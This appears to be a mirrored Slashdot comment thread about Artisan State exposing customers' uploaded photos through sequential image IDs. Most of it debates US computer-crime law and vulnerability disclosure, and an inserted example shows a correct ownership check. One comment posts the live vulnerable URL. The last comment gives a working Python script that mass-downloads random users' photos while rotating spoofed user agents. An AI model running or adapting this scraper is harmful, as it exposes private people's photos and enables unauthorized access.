Slashdot Mirror


Photo Printing Website Artisan State Allows Access To All User-Uploaded Photos

fulldecent writes: Popular photo printing website Artisan State, which specializes in bound photo books mostly for weddings or other events, unintentionally makes all its uploaded user photos available publicly for download. This case study shows how their photos are able to be downloaded and discusses the things vendors should think about when considering security of seemingly private user content. The case study also discusses how this flaw was reported to the vendor, but unfortunately never fixed. This follows other articles on Slashdot discussing security disclosure. How do you report vulnerabilities to vendors? Do you support publishing them if they are not fixed in a reasonable time?

59 of 94 comments

  1. Careful by phantomfive · · Score: 5, Informative

    Be careful when using this vulnerability......depending on your purpose in using it, you could be literally committing a crime. If you download the images by modifying the URL.......people have gone to jail for that.

    --
    "First they came for the slanderers and i said nothing."
    1. Re:Careful by phantomfive · · Score: 5, Informative

      I think you're trolling, but this guy went to jail for running almost the exact same script as is found in the article. This guy didn't even have malicious intent when he modified the URL, and he was still convicted.

      --
      "First they came for the slanderers and i said nothing."
    2. Re:Careful by phantomfive · · Score: 2

      That's a really weird request, but the relevant law is the Computer Fraud and Abuse Act, 18 U.S.C. 1030

      --
      "First they came for the slanderers and i said nothing."
    3. Re:Careful by Anonymous Coward · · Score: 1

      The law being potentially broken: 18 U.S. Code 1030(a)(2)(c) - Whoever intentionally accesses a computer without authorization or exceeds authorized access, and thereby obtains information from any protected computer.

      18 U.S. Code 1030(e) defines "protected computer" as "a computer which is used in or affecting interstate or foreign commerce or communication". This essentially means any computer connected to the Internet.

      Changing the URL to access information the user was not intended to have access to can be considered "exceeding authorized access".

    4. Re:Careful by SeaFox · · Score: 1

      Please cite the criminal code.

      It would just be lumped in under that nebulous "unauthorized access to computer systems" of 18 USC 1030.

    5. Re:Careful by phantomfive · · Score: 2

      That's cool. I'm not under the jurisdiction of USA.

      That's cool. Maybe you also don't live in a country with an extradition treaty with the US. Maybe you also don't live in a country with a similar law against 'hacking.'

      --
      "First they came for the slanderers and i said nothing."
    6. Re:Careful by CaptainDork · · Score: 2

      No.

      The point of TFA is that a URL pointing to a photo ended with the number, "21470800," and the curious would naturally wonder, "Is there something before and after that number?"

      There is, and a person doesn't even have to be logged in to view those photos.

      There's nothing illegal about that. The photo at 21470800 has no accompanying narrative that even hints that a person should not be there.

      Most people on /. are familiar with the Computer Fraud and Abuse Act, 18 U.S.C. 1030 and it does not apply here.

      The author applied due diligence and more than enough fair warning. Customers have a right to know and the site consented by omission and failure to act.

      Thanks for playing.

      --
      It little behooves the best of us to comment on the rest of us.
    7. Re:Careful by CaptainDork · · Score: 1

      So, you're saying that law prohibits me from going to www.cnn.com/jdjdh##%^hndj, right?

      --
      It little behooves the best of us to comment on the rest of us.
    8. Re:Careful by phantomfive · · Score: 1

      The point of TFA is that a URL pointing to a photo ended with the number, "21470800," and the curious would naturally wonder, "Is there something before and after that number?" There is, and a person doesn't even have to be logged in to view those photos. There's nothing illegal about that.

      Well yes, it seems like a perfectly natural thing to do. And yet people have been arrested and gone to jail for it. Search the internet or read the other posts in this story if you want to free yourself from ignorance.

      Also, nice sig.

      --
      "First they came for the slanderers and i said nothing."
    9. Re:Careful by Phil+Urich · · Score: 1

      I surmise that, since the HTTP protocol contains provisions for a "Not Authorized" response, and barring any clearly and previously agreed-on terms, not receiving such response can be construed as implicit authorization.

      Rationality and common sense agree with you. Unfortunately, US and UK case law (amongst others) does not . . .

      --
      I remember sigs. Oh, a simpler time!
    10. Re:Careful by gl4ss · · Score: 1

      about 80% would extradite to the US though.
      unfortunately.

      or the company could pursue the local similar laws.

      in this case though very unlikely, because there's too many people to prosecute it's likely that nobody will be prosecuted.

      --
      world was created 5 seconds before this post as it is.
    11. Re:Careful by monkeyzoo · · Score: 1

      Don't forget this nice Slashdot story:
      http://yro.slashdot.org/story/...

      An anonymous poster stated: "I recently discovered that a partner web site of a financial institution I do business with makes it trivially easy to view documents that do not belong to me. As in, change the document ID in a URL and view someone else's financial documents." He spoke to customer service agents, escalated to a supervisor, and was told he would get a call back, but he never heard anything else. "I'm trying to be responsible and patient in my handling of this, but I am second guessing how to move forward if not quickly resolved. So, Slashdot, how would you handle this situation?"

    12. Re:Careful by Anonymous Coward · · Score: 1

      http://upload.artisanstate.com/upload/UploadServer/GetRenderImage?imageID=21470776

    13. Re:Careful by dbIII · · Score: 1

      If you piss someone off by doing it (eg. with the AT&T vulnerability), sadly yes.
      Doing the right thing and informing people of their security holes also counts as pissing them off and has landed people in jail.

      If Kafka was writing today he'd probably do a story on one of those insane trials.

    14. Re:Careful by fulldecent · · Score: 1

      To add to the discussion regarding 18 U.S.C. 1030, I will note that this website does not affirmatively note anywhere that these photos are to be considered private.

      --

      -- I was raised on the command line, bitch

    15. Re:Careful by Anonymous Coward · · Score: 1

      That's cool. I'm not under the jurisdiction of USA.

      That's cool. Maybe you also don't live in a country with an extradition treaty with the US. Maybe you also don't live in a country with a similar law against 'hacking.'

      To explain why the poster made those points, to be extradited requires not only that the country from which the person is being extradited has an extradition treaty, but also that the country has a similar law to the US law being broken, namely if the person had done the act against someone or something inside their own country it would also have been illegal there.

      And for those who do not know, many countries, like Russia, will not allow their citizens to be extradited, so if someone in such a country hacks a US computer then there is nothing legally the US can do (other than wait for them to go to a country they can be extradited from, or lure them). The US will extradite a person to another country for hacking as long as that country is reciprocating. This means we won't send someone to Russia since they won't send anyone here.

    16. Re:Careful by twitnutttt · · Score: 1

      It probably is all too common, but fixing it is completely easy:

      1) get user id from logged in session, else return must login error
      2) get photo id from URL and query db "exists where userid=X and photoid=Y", else return access denied error

      It's trivially easy and f*ing negligent that anyone wouldn't do this.
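
The two-step check described in the comment above, written out as an added example (not code from the article, the thread, or the vendor): a handler that takes only the image ID beside one that requires a logged-in session and looks the photo up by owner and ID together. The store layout, the photo IDs, the user IDs and the `HttpError` helper are all constructed here.

```python
# Added example of the authorization check from the comment above; the data
# store, IDs and helper names are constructed for illustration.
from dataclasses import dataclass
from typing import Dict, Optional


@dataclass
class Photo:
    owner_id: int
    data: bytes


# Constructed sample store with sequential IDs like the ones in the thread.
PHOTOS: Dict[int, Photo] = {
    21470800: Photo(owner_id=7, data=b"\xff\xd8\xff\xe0 user7-ceremony"),
    21470801: Photo(owner_id=7, data=b"\xff\xd8\xff\xe0 user7-reception"),
    21470802: Photo(owner_id=9, data=b"\xff\xd8\xff\xe0 user9-portrait"),
}


class HttpError(Exception):
    """Stand-in for the framework's error response; carries the HTTP status."""

    def __init__(self, status: int, reason: str):
        super().__init__(f"{status} {reason}")
        self.status = status


def get_render_image_vulnerable(image_id: int) -> bytes:
    """The flawed shape: the only input is the image ID, so anyone who can
    guess an ID (trivial when IDs are sequential) receives the bytes."""
    photo = PHOTOS.get(image_id)
    if photo is None:
        raise HttpError(404, "Not Found")
    return photo.data


def get_render_image(session_user_id: Optional[int], image_id: int) -> bytes:
    """Step 1: the user ID comes from the server-side session, never from
    the request. Step 2: the lookup is scoped to that user, i.e. the
    equivalent of "exists where userid=X and photoid=Y"."""
    if session_user_id is None:
        raise HttpError(401, "Unauthorized")  # the comment's "must login" error
    photo = PHOTOS.get(image_id)
    if photo is None:
        raise HttpError(404, "Not Found")
    if photo.owner_id != session_user_id:
        # The comment's "access denied" error. Returning 404 here instead
        # would additionally avoid confirming that the ID exists.
        raise HttpError(403, "Forbidden")
    return photo.data


def status_of(handler, *args) -> int:
    """Exercise a handler and report 200 on success or the error status."""
    try:
        handler(*args)
        return 200
    except HttpError as err:
        return err.status


if __name__ == "__main__":
    # Anonymous caller: the vulnerable handler serves another user's photo,
    # the fixed one refuses until there is a session.
    print(status_of(get_render_image_vulnerable, 21470802))   # 200
    print(status_of(get_render_image, None, 21470802))        # 401
    print(status_of(get_render_image, 7, 21470802))           # 403
    print(status_of(get_render_image, 9, 21470802))           # 200
```

The second step is the one that matters: a session alone still lets any logged-in customer walk the ID space, so the ownership predicate must be part of the query, not a check bolted on after the fact.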

    17. Re: Careful by davester666 · · Score: 1

      It's probably based off wordpress, so it literally will be impossible to fix.

      --
      Sleep your way to a whiter smile...date a dentist!
    18. Re:Careful by Jane_Dozey · · Score: 1

      That would fit, but only if it was normal to find cars parked in abundance that are unlocked and welcome people to open the door and get in. As it stands, the only reason to try a car door is if you are authorized to enter, or have malicious intent.

      --
      Silly rabbit
    19. Re: Careful by twitnutttt · · Score: 1

      If they didn't design an app that has a concept of permissions even being *possible* then they have no business running a website like this.

      Otherwise, yes, it is not hard to fix! And even granting that it were more difficult than one would ordinarily expect, the cost/benefit and risk/reward equations make it imperative to do so.

    20. Re:Careful by CaptainDork · · Score: 1

      ... free yourself from ignorance ...

      I'm in the business, so I've already jumped that hurdle.

      --
      It little behooves the best of us to comment on the rest of us.
    21. Re:Careful by CaptainDork · · Score: 1

      Incrementing a parameter in a URL by one has nothing to do with AT&T. I'm on TWC and it worked. I'm on Verizon and it worked.

      The company hosting the photos can be pissed all they want. That doesn't matter. It's not illegal. The site is working inside the parameters and restrictions as applied by the company.

      The valid concern regarding a pissing contest is between the company and its customers.

      --
      It little behooves the best of us to comment on the rest of us.
    22. Re:Careful by phantomfive · · Score: 1

      Oh? Have you found any cases where people were jailed for similar things as in this article?

      --
      "First they came for the slanderers and i said nothing."
    23. Re:Careful by CaptainDork · · Score: 1

      "Similarity" is not a legal concept. The Computer Fraud and Abuse Act, 18 U.S.C. 1030 does not have a provision for similarities.

      --
      It little behooves the best of us to comment on the rest of us.
    24. Re:Careful by phantomfive · · Score: 1

      Please tell me oh great one, what is the source of your wisdom? Did you get a certification or something?

      --
      "First they came for the slanderers and i said nothing."
    25. Re:Careful by viperidaenz · · Score: 1

      When was the last time USA extradited someone in China for hacking? They just blame it on the Chinese government, say boohoo, no sanctions for you, because we need you more than you need us.

    26. Re:Careful by CaptainDork · · Score: 1

      I went the "or something" route and digested the law and attended a seminar regarding same, just like most IT professionals have.

      We can't manage and comply with what we don't understand, as obviated by your example.

      --
      It little behooves the best of us to comment on the rest of us.
    27. Re:Careful by phantomfive · · Score: 1

      Oh, a seminar. What a credential!

      --
      "First they came for the slanderers and i said nothing."
    28. Re:Careful by dbIII · · Score: 1

      Incrementing a parameter in a URL by one has nothing to do with AT&T

      One of the examples given by another poster was some poor bastard that went to jail for "hacking" AT&T by changing a URL and then contacting AT&T to tell them they had a problem.

    29. Re:Careful by CaptainDork · · Score: 1

      I did not get a PHD in the subject.

      I apologize for my shortcomings.

      --
      It little behooves the best of us to comment on the rest of us.
    30. Re:Careful by phantomfive · · Score: 1

      So anyway, if you do try to modify the URL to access unauthorized areas of the website, you are not only breaking the law, you are literally hacking. The security they use is lousy, but the fact that someone leaves their door open does not allow you to trespass.

      --
      "First they came for the slanderers and i said nothing."
    31. Re:Careful by CaptainDork · · Score: 1

      So anyway, they fixed it and anyway, here's your fail:

      ... to access unauthorized areas ...

      The link (before they fixed it) displayed only one thing: A photo.

      There was no narrative either above, or below, and no narrative on either side of the photo.

      Incrementing that number by one or decrementing by one (or multiples thereof) produced more photos but no narratives.

      You're telling me I'm driving in a school zone but it's a secret.

      Here's a truncation of the link above that DOES provide narrative:

      http://upload.artisanstate.com/upload/

      I modified a URL by backing over some of it.

      Show me where that's illegal.

      --
      It little behooves the best of us to comment on the rest of us.
    32. Re:Careful by phantomfive · · Score: 1

      What's your point, that the law is irrational?

      --
      "First they came for the slanderers and i said nothing."
    33. Re:Careful by CaptainDork · · Score: 1

      No, it's not the law that's irrational here.

      That's why you failed to answer the question.

      --
      It little behooves the best of us to comment on the rest of us.
    34. Re:Careful by phantomfive · · Score: 1

      That's why you failed to answer the question.

      Hey genius, you forgot to ask a question.

      Also, you really entertain me. You say people can't go to jail for this kind of thing, whereas people already have.

      --
      "First they came for the slanderers and i said nothing."
    35. Re:Careful by CaptainDork · · Score: 1

      I'm not going to jail and here's on you:

      Show me where that's illegal.

      --
      It little behooves the best of us to comment on the rest of us.
  2. Don't trust any website by phantomfive · · Score: 1
    The article asks:

    I was preparing a book for one of my clients and as I am uploading the photos, which are personal, the first thought was... should I really be uploading these photos to this website, we just met?

    The answer is no, of course you shouldn't trust any website. If you want it to remain private, leave it off the internet.

    --
    "First they came for the slanderers and i said nothing."
    1. Re:Don't trust any website by Meshach · · Score: 1

      The article asks:

      I was preparing a book for one of my clients and as I am uploading the photos, which are personal, the first thought was... should I really be uploading these photos to this website, we just met?

      The answer is no, of course you shouldn't trust any website. If you want it to remain private, leave it off the internet.

      I assume that whoever is speaking in the article has a job / contract to prepare these photos for clients who have requested that they upload the photos to the service. In that case leaving them off the Internet is not an option.

      --
      "Maybe this world is another planet's hell"
      Aldous Huxley
    2. Re:Don't trust any website by fulldecent · · Score: 1

      Obviously the photos aren't that private (the Asian girl), since I put them on Slashdot's front page. But the other ones (now seeing the lax security) it will be worth for me to invest in a good printer and print on my own.

      --

      -- I was raised on the command line, bitch

  3. Full Disclosure is the only way... by Midnight_Falcon · · Score: 2
    I've reported serious vulnerabilities to a number of companies in the past. Generally, they acknowledge receipt of the information but do nothing to fix the problem -- e.g. a race condition, a SQL injection vulnerability, etc etc. However, when I've posted information on reddit or other internet forums, the bugs tend to get fixed rather quickly.

    Full disclosure may well be a necessary evil -- sure, it allows anyone for some period of time to exploit the vulnerability; but it sure ends up getting fixed. Companies will wait months and years to fix security bugs if there is no clear and present danger.

    Any time I disclose a bug to a vendor, I now tell them in the e-mail they have five days to fix it; after that it will be publicly disclosed. And I always make good on the disclosure.

    1. Re:Full Disclosure is the only way... by phantomfive · · Score: 1

      There is only one reason to not do full disclosure......and that is if users are unable to defend themselves.

      For example, if you find a vulnerability in Squid, and an admin can defend against the vulnerability by disabling a particular extension, then you are leaving users defenseless by not disclosing it. It's irresponsible to keep it secret, because black-hats out there may already be exploiting it.

      --
      "First they came for the slanderers and i said nothing."
    2. Re:Full Disclosure is the only way... by godel_56 · · Score: 1

      I've reported serious vulnerabilities to a number of companies in the past. Generally, they acknowledge receipt of the information but do nothing to fix the problem -- e.g. a race condition, a SQL injection vulnerability, etc etc. However, when I've posted information on reddit or other internet forums, the bugs tend to get fixed rather quickly.

      Full disclosure may well be a necessary evil -- sure, it allows anyone for some period of time to exploit the vulnerability; but it sure ends up getting fixed. Companies will wait months and years to fix security bugs if there is no clear and present danger.

      Any time I disclose a bug to a vendor, I now tell them in the e-mail they have five days to fix it; after that it will be publicly disclosed. And I always make good on the disclosure.

      I hope you make the contacts anonymously, because bad things tend to happen to whistle blowers. The "shoot the messenger" philosophy is alive and well in many companies and governments.

    3. Re:Full Disclosure is the only way... by fulldecent · · Score: 1

      Thank you, this is the discussion I hoped would come out of this article. Fact is, people on Slashdot are definitely going to stumble onto this type of stuff over and over. I'm glad to run into other people to compare scruples with.

      Hackers (good word) have an instinct. If they run into an awesome API, the first thought is: how do I maximize this across all the limits and make something amazing? But with vulnerabilities, and unintended code paths, you need to step back and understand the consequences of what you are doing as well as the appearance of what you are doing. A comment from Greyfox below illustrates perfectly, "so why don't we take the dick-detection algorithm from Chat Roulette and then plug that into a batch Curl against this Artisan State, and then...". Obviously that was facetious, but you need to avoid certain lines of thinking... "well I know this thing, and I could tell everyone, but they wouldn't want that, and then they have lots of money...".

      At the end of the day, you need to have clear intentions and don't inflate your ego by thinking they are more interested in fixing the problem than you are.

      --

      -- I was raised on the command line, bitch

    4. Re:Full Disclosure is the only way... by twitnutttt · · Score: 1

      5 days seems crazy quick.

      Agreed. 30 days notice seems to be sort of the minimum norm for advance notice before disclosure.

  4. Handled very well ... by CaptainDork · · Score: 4, Insightful

    ... plenty of lead time and followup.

    These issues need to be publicized when the hosting site doesn't give a fuck. Customers have a right to know.

    --
    It little behooves the best of us to comment on the rest of us.
  5. John Oliver Already Covered This by Greyfox · · Score: 1

    You know there's pictures of penises in there, anyone can get to them. 'Nuff said, right? Wasn't chat roulette working on some penis detection code? Perhaps someone could hook that code up to an automated web robot to automatically ferret the dick pics out of this site.

    --

    I'm trying to teach myself to set people on fire with my mind... Is it hot in here?

    1. Re:John Oliver Already Covered This by Lehk228 · · Score: 1

      yes write me a program that finds and lists dick pics.

      so that... i can..... remove them ... of course...

      --
      Snowden and Manning are heroes.
  6. Car Analogy by Anonymous Coward · · Score: 1

    If you see a car unlocked you tell the owner, but you don't tell everyone. If you see a flaw in the design of the door which means all of the cars will be unlocked you don't have any way to tell the owners without telling everyone.

  7. publish by frovingslosh · · Score: 2

    After being arrested, tortured and killed for trying to alert an on-line service to their vulnerability due to poor design, I no longer try to contact vendors directly. I now publish the information in great detail to pirate sites, and I have found that this will get the attention of the company much better than trying to alert them quietly.

    --
    I'm an American. I love this country and the freedoms that we used to have.
    1. Re:publish by beerdragoon · · Score: 1

      He got better.

  8. Re:"Artisanal"? What the fuck does that even mean? by tompaulco · · Score: 1

    Your hipster district is obviously different than mine. I have literally never seen the word artisanal other than in your post. I see the word artisan all the time, but I believe in 100% of cases, it is used incorrectly. According to the dictionary it means "using a trained artistic skill". I have seen minimum wage workers slapping sandwiches together called "sandwich artisans". Nope. Slapping sandwiches together in a poor fashion and forgetting half the ingredients is not artisanship.

    --
    If you are not allowed to question your government then the government has answered your question.
  9. I have to support disclosure by Todd+Knarr · · Score: 1

    In an ideal world you'd notify the vendor, the problem would get fixed and the world would move on. Alas, we don't live in ideal world. Vendors fail to fix problems. Users don't upgrade software, or can't upgrade it or are unaware they're even using it, and the vendor doesn't publicly announce the fix and the need to apply it. The threat of disclosure, and the eventual disclosure even if the vendor doesn't say anything, is the only leverage we have to make sure vendors really do fix problems and users know what they need to know to assess the risks and mitigate the problem if they can't apply the fix. I'd love not to need to use that leverage, but we've seen how well that works already and we see repeated examples showing that vendors haven't changed their ways. Realistically the best we can manage is to notify the vendor (with full details, so they can verify the flaw is real and can't believably claim they couldn't replicate it) and give a deadline for either fixing the problem or providing mitigation measures, and then follow through with complete disclosure (so others can verify the problem's real without having to take our word for it) if the deadline passes without the vendor having disclosed the details themselves.

    Unfortunately too many vendors have made it unsafe to do even that much. They don't just ignore problem reports and deny the problem exists, they actively try to silence the person reporting it through lawsuits and criminal prosecution and smear campaigns. When dealing with vendors like that you can't safely notify the vendor of a problem. I don't like it, but when dealing with a vendor like that all you can do is dump all the details into one or more suitable disclosure forums and make sure you've covered your tracks thoroughly so the vendor can't trace the disclosure back to you. Then clam up on the subject and don't say a single word anywhere to give anyone the idea that you were at all involved, lest you give the vendor a reason to suspect you. It's not a polite, civilized way of dealing with the matter, but I figure if the vendor's made its bed it's just going to have to lie in it.

  10. Re:"Artisanal"? What the fuck does that even mean? by friedmud · · Score: 1

    My favorite is when people mispronounce / misspell artisan as artesian.

    I always ask them what those pastries/bread/haircuts/etc. have to do with natural water wells :-)

  11. Oblig. Schneier essay on Full Disclosure by Phil+Urich · · Score: 1

    https://www.schneier.com/essay... Well worth the read if you haven't before.

    --
    I remember sigs. Oh, a simpler time!
  12. Re:"Artisanal"? What the fuck does that even mean? by dbIII · · Score: 1
    Well, that's giving it the level of respect it normally deserves. One word that doesn't fit is as good as another.

    I always ask them what those pastries/bread/haircuts/etc. have to do with ... water wells

    It's the pressure man!

    My pet hate now is I live in a suburb on a bend on a river and a pile of trendy people are calling it a "village" on a "peninsula".

  13. First vulnerability release on /.? by monkeyzoo · · Score: 1

    First time a vulnerability was disclosed on Slashdot?

  14. Re:fixed? by Hognoxious · · Score: 1

    Yup. See those gold highlights in the background in the one where they're dancing? Distinctly oval.

    --
    Confucius say, "Find worm in apple - bad. Find half a worm - worse."
  15. Artisan pizza? No thanks, carpenters are chewy. by Hognoxious · · Score: 1

    I have literally never seen the word artisanal other than in your post.

    So you have a poor vocabulary. Try watching something other than Fox news.

    Of course it's possible you live in a place full of fuckwits and they just use the noun as an adjective. Artisan sandwich? Are they cannibals round here?

    --
    Confucius say, "Find worm in apple - bad. Find half a worm - worse."
  16. Like this? by Anonymous Coward · · Score: 1

    import requests
    import random
    import os
    import sys
    import time

    sys.stdout = os.fdopen(sys.stdout.fileno(), 'w', 0)
    tmp_pth = 'C:\\temp'
    os.chdir(tmp_pth)
    headers = {
            "Content-Type": "application/x-www-form-urlencoded",
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
            "Accept-Language": "en-US,en;q=0.5",
            "User-Agent": "Mozilla/"+str(round(random.random() * 5, 1))+" (Windows NT 6; WOW32; rv:38.0) Gecko/20100101 Firefox/"+str(round(random.random() * 37, 1)),
            "DNT": "1"
            }

    agents = [
            "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3",
            "Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)",
            "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)",
            "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1",
            "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1",
            "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)",
            "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)",
            "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)",
            "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)",
            "Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)",
            ]
    for i in range(200):
            ID = str(int(random.random() * 8000000))
            headers["User-Agent"] = agents[int(random.random() * 10)]
            r = requests.get(
                            'http://upload.artisanstate.com/upload/UploadServer/GetRenderImage?imageID=' + ID,
                            headers=headers)
            fh = open(ID+'.jpg', 'wb')
            fh.write(r.content)
            fh.close()
            print 'wrote', i, tmp_pth+'\\'+ID+'.jpg'
            time.sleep(random.random()/10.)